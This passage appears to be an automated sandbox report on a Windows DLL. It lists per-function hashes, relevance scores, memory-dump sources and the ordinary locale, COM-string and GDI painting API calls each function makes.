Opcode Fuzzy Hash: 2f8bd2b0cb01642fb1ed5d70814cb2f3a0491a9ab557b55fd267cee028c523b7
Instruction Fuzzy Hash: 23B18D71210609CFD715CF68C496B947BE1FF05364F298668E8A9DF2A5C339ED82CB48

Uniqueness

Uniqueness Score: -1.00%

Function 6EA14C86, Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6EA14C9C

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 6228300cf51cc7dfeb8243a0691d68523ef0b7b43115b981abdb90f3c5429268
Instruction ID: d60e16c8a63bfe0c11213b6d5256f5c20988528241ff2db038780cbc0410079c
Opcode Fuzzy Hash: 6228300cf51cc7dfeb8243a0691d68523ef0b7b43115b981abdb90f3c5429268
Instruction Fuzzy Hash: 075179B1A08605CBEF05CF99D4903AABBF1FB88304F25C02AE415EF284D3359986CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2BA20, Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e60cd9e67edde2554f1d6b809b73f317316b5bdb5e571f8f635fadcaa14106e0
Instruction ID: 70b6284444053c0d05ec09c746d17d8d6cfe6e91bf33a922cf70bcd9f2efecd5
Opcode Fuzzy Hash: e60cd9e67edde2554f1d6b809b73f317316b5bdb5e571f8f635fadcaa14106e0
Instruction Fuzzy Hash: 3D41B47580421CAFDB10DFA9CC88AEABBBDEF45304F1846E9E41DE3205DA359E848F14

Uniqueness

Uniqueness Score: -1.00%

Function 6EA34C7C, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2897C: GetLastError.KERNEL32(00000000,00000000,00000004,6EA1B7B1,00000000,00000000,00000000,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28981
Part of subcall function 6EA2897C: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28A1F

Part of subcall function 6EA2897C: _free.LIBCMT ref: 6EA289DE
Part of subcall function 6EA2897C: _free.LIBCMT ref: 6EA28A14

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6EA34CD0

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: 18aefd2871e2791f0a69ef37cb97038bafaebfc3a6bcb6f742e5d2734ed36407
Instruction ID: b4be1d97cf6e7322970ad5cd4680b05a9a7fa42acbdfd7ff04ce48cf7d915826
Opcode Fuzzy Hash: 18aefd2871e2791f0a69ef37cb97038bafaebfc3a6bcb6f742e5d2734ed36407
Instruction Fuzzy Hash: 82213A71514226ABEB28CEA5ED40AFA73ACEF05355F24007AFD01DB140EB36DD82C758

Uniqueness

Uniqueness Score: -1.00%

Function 6EA34901, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2897C: GetLastError.KERNEL32(00000000,00000000,00000004,6EA1B7B1,00000000,00000000,00000000,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28981
Part of subcall function 6EA2897C: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28A1F

EnumSystemLocalesW.KERNEL32(6EA34A27,00000001,00000000,?,6EA29DC4,?,6EA3505F,00000000,00000055,?,?), ref: 6EA34973

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 4578c0eece23b18694db7a227c825c7126cb6ee1a2c15f8424804f9a5f91b3df
Instruction ID: bc4ae490bfb6b829400c80de3d1a7c2385759f324ceee811673e5c068872d067
Opcode Fuzzy Hash: 4578c0eece23b18694db7a227c825c7126cb6ee1a2c15f8424804f9a5f91b3df
Instruction Fuzzy Hash: 0311293B2147115FDB189F79C8905AAB7A2FF84359B29442DE58687B00D7326983C744

Uniqueness

Uniqueness Score: -1.00%

Function 6EA34EAC, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2897C: GetLastError.KERNEL32(00000000,00000000,00000004,6EA1B7B1,00000000,00000000,00000000,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28981
Part of subcall function 6EA2897C: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28A1F

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6EA34C43,00000000,00000000,?), ref: 6EA34ED8

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: ef1155e8419432d5b36f7624fb4a74847e605a9ea5d7a27a791fb55d74939e0c
Instruction ID: 83ab3915827fcb35f0c421668533fe8f5caa1d5d96b5aafa7e7ab0f1cb58ad33
Opcode Fuzzy Hash: ef1155e8419432d5b36f7624fb4a74847e605a9ea5d7a27a791fb55d74939e0c
Instruction Fuzzy Hash: FCF07D36500136AFEB144AA5CC05BFB77A8EB40B15F294429EC15E3140DE72FD83C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 6EA3480D, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2897C: GetLastError.KERNEL32(00000000,00000000,00000004,6EA1B7B1,00000000,00000000,00000000,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28981
Part of subcall function 6EA2897C: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28A1F

Part of subcall function 6EA2897C: _free.LIBCMT ref: 6EA289DE
Part of subcall function 6EA2897C: _free.LIBCMT ref: 6EA28A14

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6EA29DCB,00000000,6EA29EEB), ref: 6EA34861

Strings

utf8, xrefs: 6EA347CE

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free$InfoLocale
String ID: utf8
API String ID: 2003897158-905460609
Opcode ID: fad870b90102ad2100602cf9d77db6562f25a5d7203f5c940298bd61004242be
Instruction ID: 278edc3a7ab19d48ed082073df63e7a04d06c1f81d196457483ac387fc1055ad
Opcode Fuzzy Hash: fad870b90102ad2100602cf9d77db6562f25a5d7203f5c940298bd61004242be
Instruction Fuzzy Hash: 3AF02D72A10215ABD7149BB8DC04DFA33ACDF45314F154179A906DB240DB759D458794

Uniqueness

Uniqueness Score: -1.00%

Function 6EA3499C, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2897C: GetLastError.KERNEL32(00000000,00000000,00000004,6EA1B7B1,00000000,00000000,00000000,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28981
Part of subcall function 6EA2897C: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28A1F

EnumSystemLocalesW.KERNEL32(6EA34C7C,00000001,00000000,?,6EA29DC4,?,6EA35023,6EA29DC4,00000055,?,?,?,?,6EA29DC4,?,?), ref: 6EA349E6

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 69319c80a3a848cc675b43f12800a71ca68f89456cbcf39ffa235757a20d8491
Instruction ID: 7918f266cfae87533575992d6215ee5a92c0d6568b6376d4022c5d9359a49264
Opcode Fuzzy Hash: 69319c80a3a848cc675b43f12800a71ca68f89456cbcf39ffa235757a20d8491
Instruction Fuzzy Hash: 25F046322003145FDB249FB98C80A6A7FA6FF81368B29842DF945CB650C772AC83C708

Uniqueness

Uniqueness Score: -1.00%

Function 6EA348B6, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2897C: GetLastError.KERNEL32(00000000,00000000,00000004,6EA1B7B1,00000000,00000000,00000000,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28981
Part of subcall function 6EA2897C: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28A1F

EnumSystemLocalesW.KERNEL32(6EA3480D,00000001,00000000,?,?,6EA35081,6EA29DC4,00000055,?,?,?,?,6EA29DC4,?,?,?), ref: 6EA348ED

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: ac4f440fb3028bed2d82de812b56d54b23d3d49fc19846e1604fe1a8a11ac105
Instruction ID: 2a5ca47d56ecd701bad67f84181bbf20962708e5b9eb989722c1abbb6a66b429
Opcode Fuzzy Hash: ac4f440fb3028bed2d82de812b56d54b23d3d49fc19846e1604fe1a8a11ac105
Instruction Fuzzy Hash: 46F0E5367002955BDB049FB9D844A6ABFA4EFC2758B1A4059EA06CB650C6329883C758

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2C982, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 6EA25B64: EnterCriticalSection.KERNEL32(?,?,6EA24C53,00000000,6EA4A218,0000000C,6EA24C1A,?,?,6EA2B439,?,?,6EA28B1E,00000001,00000364,00000008), ref: 6EA25B73

EnumSystemLocalesW.KERNEL32(6EA2C975,00000001,6EA4A598,0000000C,6EA2CD3B,00000000), ref: 6EA2C9BA

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 5c63ee25694e00bb6368a509b08f122bcf0f783d7ef209221a8484042d51d3dd
Instruction ID: 52ac25cc6ae50b3e9275adba673053128cddbb019945470690ac96b82f41386c
Opcode Fuzzy Hash: 5c63ee25694e00bb6368a509b08f122bcf0f783d7ef209221a8484042d51d3dd
Instruction Fuzzy Hash: 2EF03475900600EFDB10EFA8D540F8C37B4BB0A72AF04856AE814EF390CB358986CF49

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2CE41, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,?,?,6EA29EF3,?,20001004,?,00000002,00000000,?,?), ref: 6EA2CE75

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 0780e45d12be8f11150e27c85c9c3adade17d68a64fd2bcd84cdd6df89942f57
Instruction ID: 0f97fe12f745bcd1e21d13d20ca756917316bceb10e784d8905b1b8bd4bfbb8b
Opcode Fuzzy Hash: 0780e45d12be8f11150e27c85c9c3adade17d68a64fd2bcd84cdd6df89942f57
Instruction Fuzzy Hash: 2FE04F71540628BFCF225FA1DC14E9E3E1AEF45750F098920FC0579120CB32C9A1AAD8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1C366, Relevance: 1.5, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

0, xrefs: 6EA1C4FE

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 03787e65c12be385958c30b11e2ddda3c1f78b57540c67bd691ef53904362127
Instruction ID: 5f3a391eca6bb6922f8ffee7168b088df618930b671f0cba19366939377e9f01
Opcode Fuzzy Hash: 03787e65c12be385958c30b11e2ddda3c1f78b57540c67bd691ef53904362127
Instruction Fuzzy Hash: EE61AB3168C7069ADB5CCAE889A57FEB3A9AB42758F44083ED442DF2C0D761DDC1834E

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1C132, Relevance: 1.5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

0, xrefs: 6EA1C2AE

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: f8843f869ee3a7cab789a99038b5158e12af4cc44804b228eaaba3f9a03773db
Instruction ID: 06ba8e43f4a372f97958ffd8d742eae892894db616172cd5fec7feb1fd0935e5
Opcode Fuzzy Hash: f8843f869ee3a7cab789a99038b5158e12af4cc44804b228eaaba3f9a03773db
Instruction Fuzzy Hash: 6F519B702CC7496BDB9C99E889A07EEB79E9B83304F18093AD891DF280D611DDC5C24F

Uniqueness

Uniqueness Score: -1.00%

Function 6EA07A30, Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

t, xrefs: 6EA07ACE

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: t
API String ID: 0-4046888548
Opcode ID: 721a9c3d5be6aa06c92f94912cd8d74cb88f7b706653359899b57a7f28bd89f0
Instruction ID: 534962e363f69db5654b9ab594c09acf9852f454a505944213cf6f17d7454558
Opcode Fuzzy Hash: 721a9c3d5be6aa06c92f94912cd8d74cb88f7b706653359899b57a7f28bd89f0
Instruction Fuzzy Hash: D821C276A042148FDB50DF59E8C0A65BBF5FF4A314B1A41EAEC49CB356D230ED90CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EA30569, Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 844d560059a5738c40ea606778c96c1bdda7180d7cc7d42b3b2f542a457bc000
Instruction ID: 3cee6838d0cff57c09d0bb80e0cbc4c2a293a98953ea458d8234d00f6a01e86f
Opcode Fuzzy Hash: 844d560059a5738c40ea606778c96c1bdda7180d7cc7d42b3b2f542a457bc000
Instruction Fuzzy Hash: A8321422D29F114DDB639535C872326A688AFB73C5F25D727F82AF5A95FB29C8C34100

Uniqueness

Uniqueness Score: -1.00%

Function 6EA340B7, Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 4283097504-0
Opcode ID: c608d8f42d51db329d1ac0235bb3dcd0c7d35ab8d926b76f46cc020dfa02f91b
Instruction ID: 888ab18b50dea1ba70c748b42174470cce9766d30d620821c77dbf1ae77fa5c4
Opcode Fuzzy Hash: c608d8f42d51db329d1ac0235bb3dcd0c7d35ab8d926b76f46cc020dfa02f91b
Instruction Fuzzy Hash: 54B138355147168FD7249BA8CC81AABB3F8EF44308F28496DD986C7644EB76A9C6C708

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1FD1F, Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e24b44b9762e9998cb07bbb1c66afac786d29e044ee2bb0456e4d39d2da0b84e
Instruction ID: 8ab1f87c5e6aae30b5c81426c3ebb94d20860fdb068569a3ff9d327ee1a82620
Opcode Fuzzy Hash: e24b44b9762e9998cb07bbb1c66afac786d29e044ee2bb0456e4d39d2da0b84e
Instruction Fuzzy Hash: CD517F75E04159EFDB04CF99C990AEEBBB2EF89304F28809DE414AB251C7349E91CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA358EF, Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a40a77896024b07e2ed9d93b25e914a9ac20febded4d21782f1984438a0bfc0
Instruction ID: 344d0a463440d1ecb0039c82ec0fde10256cf483f4e5e47f4b6cb678fc15e84d
Opcode Fuzzy Hash: 3a40a77896024b07e2ed9d93b25e914a9ac20febded4d21782f1984438a0bfc0
Instruction Fuzzy Hash: 0B21A473F20539477B0CC47E8C522B9B6E1C68C511745827AF8A6EA2C1D968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 6EA357CB, Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afe3fbc06799da9876bb4e5c810e27d4322d51473599fc9f8a1931c2f3b7f8d2
Instruction ID: 41a0d8a86b187a61c167b944e8b29985cd520e46a31cf7f40f14e5221e9e0da5
Opcode Fuzzy Hash: afe3fbc06799da9876bb4e5c810e27d4322d51473599fc9f8a1931c2f3b7f8d2
Instruction Fuzzy Hash: 8C11AB33F30C295B275C81AD8C13279A6D2DBD815071F533AD826E7284E854DE23D290

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2B715, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ceeb394943dedc91ac85ec01282585c4c36c65ed53bceaa8aa5d21c9e89172b
Instruction ID: 97d85bd9bfccf34e00faa0c4769d78f0b02d66e806f9e8bd2108bd18f1cad5ce
Opcode Fuzzy Hash: 5ceeb394943dedc91ac85ec01282585c4c36c65ed53bceaa8aa5d21c9e89172b
Instruction Fuzzy Hash: 18E04F32912128EBCB11DED885009DAB7BCEB05A11B1906A6B904E3500C670DE40C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 6EA01460, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1acb5c8045ee6bc425f6a4ef57708948a1d25ec9448938989fb78de162df66cd
Instruction ID: 71ab91b0bf194e51c7a1073808c9bfc34cc358328de20babc5b546a21e7fd2b3
Opcode Fuzzy Hash: 1acb5c8045ee6bc425f6a4ef57708948a1d25ec9448938989fb78de162df66cd
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6EA08980, Relevance: 40.7, APIs: 20, Strings: 3, Instructions: 439memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 6EA08AD7
VariantInit.OLEAUT32(?), ref: 6EA08B06
VariantCopy.OLEAUT32(?,?), ref: 6EA08B14
SysFreeString.OLEAUT32(00000000), ref: 6EA08B5B
SysFreeString.OLEAUT32(-00000001), ref: 6EA08BEE
VariantClear.OLEAUT32(?), ref: 6EA08C27
SysFreeString.OLEAUT32(-00000001), ref: 6EA08C3F
SysFreeString.OLEAUT32(00000000), ref: 6EA08C7A
SysFreeString.OLEAUT32(00000000), ref: 6EA08C93
MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6EA08D14
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6EA08D1E
MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6EA08D3B
VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6EA08D50
SysFreeString.OLEAUT32(00000000), ref: 6EA08D5F
SysFreeString.OLEAUT32(00000000), ref: 6EA08DE8
SysFreeString.OLEAUT32(00000000), ref: 6EA08E2C
_com_issue_error.COMSUPP ref: 6EA08E6E
_com_issue_error.COMSUPP ref: 6EA08E74
_com_issue_error.COMSUPP ref: 6EA08E7E
SysFreeString.OLEAUT32(76AFD5B0), ref: 6EA08E84

Strings

offsetY, xrefs: 6EA08B22
lines, xrefs: 6EA08D0B, 6EA08D32
", xrefs: 6EA08E37

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Variant_com_issue_error$AllocByteCharMultiWide$BstrClearCopyInit
String ID: "$lines$offsetY
API String ID: 1469084953-1489481244
Opcode ID: 9a2b2f1617243263fcc8dd9064942b5e7c18f5054041feff3944076312e12c30
Instruction ID: ccf0e3a155baaa26ee763ed56b1752ad2d56449d74931402b0671950117d3702
Opcode Fuzzy Hash: 9a2b2f1617243263fcc8dd9064942b5e7c18f5054041feff3944076312e12c30
Instruction Fuzzy Hash: 0CF1BE70A0130ADFEB40CFE4D954BAEBBB8AF45308F244558E415AB281DB75DD85CB68

Uniqueness

Uniqueness Score: -1.00%

Function 6EA11240, Relevance: 31.7, APIs: 21, Instructions: 187windowCOMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 6EA112F3
GetParent.USER32(?), ref: 6EA112FC
GetClientRect.USER32 ref: 6EA11312
CreateCompatibleDC.GDI32(?), ref: 6EA11318
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6EA1133A
SelectObject.GDI32(00000000,00000000), ref: 6EA11346
SelectObject.GDI32(00000000,?), ref: 6EA11358
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6EA11371
SendMessageW.USER32(?,0000000F,?,00000000), ref: 6EA1137F
SetBkMode.GDI32(?,00000001), ref: 6EA11388
SetTextColor.GDI32(?,00FFFFFF), ref: 6EA11394
GetClientRect.USER32 ref: 6EA113A6
